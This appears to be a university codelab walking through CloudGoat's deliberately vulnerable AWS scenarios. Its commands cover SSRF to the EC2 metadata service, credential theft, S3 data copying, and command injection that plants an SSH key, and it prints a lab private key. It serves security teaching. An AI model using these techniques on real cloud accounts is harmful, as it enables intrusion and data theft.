The complexity of cloud-based applications can lead to a vast number of security issues. To show how these issues can occur, Rhino Security Lab's CloudGoat implements an intentionally vulnerable set of cloud deployments on AWS that users can exploit to gain unauthorized access.
In this codelab, we will walk-through how to exploit each deployment.
Note that if you are using Cloud9 for this exercise, you must turn off AWS managed temporary credentials. The vulnerable application credentials are located here. To add these credentials as a profile within the AWS CLI, perform the following command and copy/paste the credentials into the profile. For the region name, specify us-east-1
(where the resources for CloudGoat have been deployed). Leave the output format set to the default.
aws configure --profile raynor
Starting with Raynor's limited credentials, you will use it to view prior versions of the security policy associated with Raynor.
While the permissions you currently have would allow you to revert to a prior version of the policy and restore a full set of admin rights, you will simply find the policy version that corresponds to a full set of rights.
Fill in the raynor username in the command below and run it.
aws iam list-attached-user-policies --profile raynor --user-name <raynor_username>
List the versions of the policy that is associated with raynor
aws iam list-policy-versions --profile raynor --policy-arn <PolicyARN>
Step through each version of the policy using the command below.
aws iam get-policy-version --profile raynor
--policy-arn <PolicyARN> --version-id <versionID>
One can set the policy version to the version that allows full privileges to then gain access to all of the AWS project's resources via the set-default-policy-version
command. However, as this is a shared instance of CloudGoat, leave the policy version alone for others.
Misconfigured proxies can allow an external attacker to proxy requests to sensitive internal servers that are not directly reachable otherwise. An example of this is internal Metadata servers that keep sensitive authorization information for the account running the infrastructure. This is exactly what happened in the Capital One breach which this scenario is derived from.
The vulnerable proxy location is given here.
We start with the proxy and initiate a server-side request forgery that allows us to use the proxy to pivot over to the Metadata service for the EC2 instance. Given the credentials we find on the Metadata service, we then assume the role associated with the EC2 instance hosting the proxy.
From this role, we can see that it has access to a multitude of S3 buckets that would not otherwise be accessible to us. Using the AWS CLI, we can then use the role obtained to exfiltrate sensitive data.
Start by visiting the site from linux.cs.pdx.edu
using curl
to hit the web server. (Access to the site is restricted to PSU machines).
curl http://<ec2_instance_IP>
For the purpose of this exercise, the server has been set up to proxy request, but restricts itself only to requests to the metadata service that houses the instances AWS credentials. In the HTTP request headers, we can inject a "Host:" header to specify that we're interested in requesting the Metadata service. Repeat the curl command and specify the well-known IP address of the Metadata service.
curl http://<ec2_instance_IP> -H 'Host: 169.254.169.254'
We can navigate the Metadata service using the URL being proxied. In the previous output, a directory called latest is shown.
curl http://<ec2_instance_IP>/latest -H 'Host: 169.254.169.254'
By navigating the Metadata service, one can access the roles associated with the EC2 instance running the proxy server.
curl http://<ec2_instance_IP>/latest/meta-data/iam/security-credentials/ -H 'Host: 169.254.169.254'
curl http://<ec2_instance_IP>/latest/meta-data/iam/security-credentials/<name_of_role> -H 'Host: 169.254.169.254'
Note that the AccessKeyId
, the SecretAccessKey
, and a session Token
are all available for you to now take on the roles associated with the EC2 instance. A session token is an ephemeral credential that can be used to authenticate access to resources.
Configure a profile called erratic
from the AWS CLI containing the AWS access key ID and secret access key information as before. Note the origin of the profile name by reading this article on the Capital One breach in 2019.
aws configure --profile erratic
While the aws configure
command allows us to create a profile with a particular AccessKeyId
and SecretAccessKey
, it does not allow us to specify the Token.
There are two ways to add the token. One is to include it in another aws configure
command as shown below:
aws configure set aws_session_token <BankRoleToken> --profile erratic
Another way is to edit ~/.aws/credentials
. The file contains the profile information from previous aws configure
commands. Adding the session token as part of the profile achieves the same result.
[erratic]
aws_access_key_id = ASIA...Z4N
aws_secret_access_key = PkvP...PM9
aws_session_token = IQoJ...w==
The token itself is ephemeral and will only be valid for several minutes. If you get an InvalidToken
error on any of the subsequent commands, you will need to go back to Step 3 and obtain a fresh one.
Use the credentials to list all of the buckets in S3 for this project.
aws s3 ls --profile erratic
Identify the bucket that might contain "cardholder data" as was done by erratic
in the Capital One breach.
Copy over all of the files found in the open bucket. Note that one can use either a recursive copy:
aws s3 cp --recursive s3://<bucket-name> ./cardholder-data --profile erratic
Or a sync command:
aws s3 sync s3://<bucket-name> ./cardholder-data --profile erratic
head -2 cardholder-data/*.csv
The vulnerable application credentials are located here . To add these credentials as a profile within the AWS CLI, perform the following command and copy/paste the credentials into the profile. For the region name, specify us-east-1
(where the resources for CloudGoat have been deployed)
aws configure --profile solus
Starting with Solus's limited credentials, you will use it to discover another access key.
The keys allow you to discover a running EC2 instance that contains an SSRF vulnerability. Using this vulnerability, you will access the Metadata service.
The Metadata service exposes the EC2 instance's keys which you can then use to obtain access to a storage bucket that contains IAM keys for an administrator. Using these credentials, you will invoke a restricted Lambda function.
Use the solus
profile to list the Lambda functions that are accessible.
aws lambda list-functions --profile solus
Find the cloud function associated with the CloudGoat level (cg-lambda-...
) and try invoking it as solus
aws lambda invoke ./out.txt --profile solus --function-name cg-lambda-<cloudgoat_id>
While the profile is able to list the Lambdas, it does not have the ability to execute them. However, listing the functions also lists the environment variables that the Lambda has been given. Unfortunately, it is often the case that AWS credentials are sent via environment variables since it is best practice not to include them within source code. From the listing, identify an EC2 access key that the Lambda function uses to authenticate itself to project resources. Add a profile called wrex
that contains these credentials specifying us-east-1
for the region.
aws configure --profile wrex
Use the Lambda's credentials to list all of the running EC2 instances it has access to
aws ec2 describe-instances --filters Name=instance-state-name,Values=running --profile wrex
Within the instances, is a server associated with ec2_ssrf
that is running a web site. Get its IP address, then login to a PSU machine and use curl
to access the page. (The level has restricted access to PSU IP addresses only for security purposes).
# On linux.cs.pdx.edu or linuxlab.cs.pdx.edu
curl http://<IP_address_of_server>
The site is expecting a URL to be given and throws an error when it is not. Access it again, but with a 'url'
parameter. Note that we use the double-quotes around the URL so the shell does not interpret the ?
or =
characters in the URL.
# On linux.cs.pdx.edu or linuxlab.cs.pdx.edu
curl "http://<IP_address_of_server>/?url=http://<FMI>"
The proxy implemented may be vulnerable to an SSRF attack. The Metadata service is a common target for such attacks. Send in the EC2 Metadata service URL as the url
parameter in order to obtain the credentials the EC2 instance uses to access resources in the project.
http://169.254.169.254/latest/meta-data/iam/security-credentials/
The proxy fetches the URL and returns a directory that identifies the role associated with the EC2 instance. Access the proxy again.
http://169.254.169.254/latest/meta-data/iam/security-credentials/cg-ec2-role-<cloudgoat_id>
The access reveals the keys associated with the role that the EC2 instance has been given. It also contains a session token.
Configure a profile called ec2role
from the AWS CLI containing the AWS access key ID and secret access key information. Specify the region as us-east-1
.
aws configure --profile ec2role
Then, to specify the full credentials for the role including its session token, edit ~/.aws/credentials
. Within this file, find the ec2role
and add the session token information.
[ec2role]
aws_access_key_id = ASIA...Z4N
aws_secret_access_key = PkvP...PM9
aws_session_token = IQoJ...w==
Use the ec2role
to list the buckets it has access to.
aws s3 ls --profile ec2role
Within the bucket listings is a 'secret' bucket containing the name of the role discovered via the prior SSRF. Use the ec2role
to list the buckets it has access to.
aws s3 ls --profile ec2role s3://cg-secret-s3-bucket-<cloudgoat_id>
Retrieve the text file that resides in the bucket and view its contents
aws s3 cp --profile ec2role s3://cg-secret-s3-bucket-<cloudgoat_id>/<textfile> .
The file stores credentials. As bad as it is to have credentials exposed in environment variables and SSRF accesses, it's just as bad to have the credentials in storage buckets or source code. Use the credentials in this file to configure another role called shepherd
specifying us-east-1
for the region.
aws configure --profile shepherd
Go back and attempt to invoke the initial Lambda function done in the first step as solus
, but use the shepherd
profile.
aws lambda invoke ./out.txt --region us-east-1 --profile shepherd --function-name cg-lambda-<cloudgoat_id>
out.txt
The vulnerable application credentials are located here.
There are two ways to solve this level. We will use the one that leverages Lara's credentials. Add these credentials as a profile within the AWS CLI. For the region name, specify us-east-1
(where the resources for CloudGoat have been deployed)
aws configure --profile Lara
Starting with Lara's limited credentials, list the S3 buckets it can access and find that one of them has log files from an Elastic Load Balancer instance the account is running.
The log files reveal a secret admin URL that is part of the web service being hosted. Unfortunately, there is a remote-code execution vulnerability within it. Exploit it to gain command access on an EC2 instance.
From here, we'll take a peak at the EC2 Metadata service to reveal all of the information the EC2 instance needs to access the backend database for the service. One could use this information to access the database and finish the level, but we'll solve it a more convoluted way for fun! Returning back to the instance, we will leverage the shell to list the S3 buckets the instance has access to and find the file in the bucket that contains the same backend database credentials found in the Metadata. Use the AWS CLI to list the RDS instances available to discover the location of the backend database.
We will then use the database credentials and the location information of the RDS backend to then access the database and reveal the secret text.
Starting with Lara's limited credentials, list all of the S3 buckets it can find and see which ones it can list the contents for.
aws s3 ls --profile Lara
aws s3 ls --profile Lara s3://cg-XXX-s3-bucket-cgid...
aws s3 ls --profile Lara s3://cg-YYY-s3-bucket-cgid...
aws s3 ls --profile Lara s3://cg-ZZZ-s3-bucket-cgid...
For the bucket that this set of credentials can access, recursively list all of its contents.
aws s3 ls --recursive --profile Lara s3://<cg-bucket>
The bucket has log files from an Elastic Load Balancer instance the account is running. Sync the bucket contents to a local directory, then examine a log file from a prior running version of a service from 06/19/2019. Find a secret route to an HTML file that the service supported.
aws s3 sync --profile Lara s3://<cg-logs-bucket> .
less <path_to_log_file>/<logfile>
grep html <path_to_log_file>/<logfile>
Find the location of the load balancer for the currently deployed version of the service.
aws elbv2 describe-load-balancers --profile Lara
Visit the URL in a web browser, the URL will return something similar to below:
Append the secret route to the HTML file in the previous step to reveal the hidden web interface for running commands on the web site directly that is still supported by the service.
Visit https://ifconfig.me to see the function it provides. Then within the "Run Signup Command" UI, execute the following to obtain the IP address of the instance running the web site.
curl https://ifconfig.me
The UI allows us to run any command. One command that we can run is to add an ssh
key that we control to the authorized_keys
of the machine running the UI. First, run the command below via the "Run Signup Command" UI to dump out the contents of the file:
cat /home/ubuntu/.ssh/authorized_keys
We wish to create an ssh
key and add it to the authorized_keys
file of the web site so that we can subsequently log into it. One note about the level is that it has been configured to only allow ssh
from PSU machines.
So, to begin with, log into a linuxlab
machine and run the following ssh-keygen
command to generate a public/private ssh
keypair keypair (foo.pub
, foo
).
ssh-keygen -t ed25519 -f foo
Then dump out the public key (foo.pub
).
cat foo.pub
If the public key has "=
" anywhere within it, repeat the ssh-keygen
command until you generate a public key without the character in it. This is necessary since the command injection on the application is done in a way that evaluates the "=
" character.
Alternatively, if you wish to skip this step, you may instead use the keypair provided below for the exercise. Copy the contents below into their respective files foo.pub
and foo
.
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKdwX5jjY0TugPOVGBbU+I8JoY4Ycj7p/szytyHaBlXy wuchang@mashimaro
-----BEGIN OPENSSH PRIVATE KEY----- b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW QyNTUxOQAAACCncF+Y42NE7oDzlRgW1PiPCaGOGHI+6f7M8rch2gZV8gAAAJihKTfIoSk3 yAAAAAtzc2gtZWQyNTUxOQAAACCncF+Y42NE7oDzlRgW1PiPCaGOGHI+6f7M8rch2gZV8g AAAEAAyLF7YDOLMAj3Cby4Yb/QXbWI6Q2HinQXK5NmlX6aWKdwX5jjY0TugPOVGBbU+I8J oY4Ycj7p/szytyHaBlXyAAAAEXd1Y2hhbmdAbWFzaGltYXJvAQIDBA== -----END OPENSSH PRIVATE KEY-----
We now have an ssh
keypair on a PSU Linux machine. To utilize the private key, we'll first need to change its permissions to allow read-only access to the user.
chmod 400 foo
We will now add the public key (foo.pub
) to the web site's authorized_keys
. Go back to the "Run Signup Command" UI and run an echo command that contains the contents of foo.pub, appending the output to the site's authorized_keys
file.
echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKdwX5jjY0TugPOVGBbU+I8JoY4Ycj7p/szytyHaBlXy wuchang@mashimaro" >> /home/ubuntu/.ssh/authorized_keys
Ensure the output shows no errors. Then, re-run Step 5 to see the key has been added properly.
Use the private ssh
key to now log into the web site via its IP address (from Step 4).
ssh -i foo ubuntu@<IP_address_of_web_site>
You should now be logged into the instance running the web site.
When an EC2 instance is started, one can specify a script to execute in 'user-data' that installs software and sets up the VM. The Metadata service holds this script. Since we now have a foothold on a victim's instance, we can query the Metadata service for the script.
curl http://169.254.169.254/latest/user-data
We could use these directly, however, we'll be taking an alternate path.
See if the AWS CLI has been installed on the machine.
which aws
If not, then you are the first visitor to this level. Go ahead and install the AWS CLI
sudo apt install awscli
Then use the AWS CLI to list the S3 buckets from Step 1.
aws s3 ls
aws s3 ls s3://cg-XXX-s3-bucket-cgid...
aws s3 ls s3://cg-YYY-s3-bucket-cgid...
aws s3 ls s3://cg-ZZZ-s3-bucket-cgid...
One bucket you can access is a 'secret-s3-bucket
' that contains a file called db.txt
in it. See the credentials that are contained in it.
aws s3 cp s3://<cg-secret-s3-bucket>/db.txt -
Use the AWS CLI on the instance to find all of the AWS RDS instances the web frontend has access to.
aws rds describe-db-instances --region us-east-1
Run the PostgreSQL client to connect to the RDS instance using the credentials found in db.txt
psql postgresql://<db_user>:<db_password>@<rds-instance-address>:5432/<db_name>
Within the PostgreSQL client,
\dt
SELECT * from <table-name>;
You've completed the AWS CloudGoat lab.
The exercises have shown you cloud-based examples of: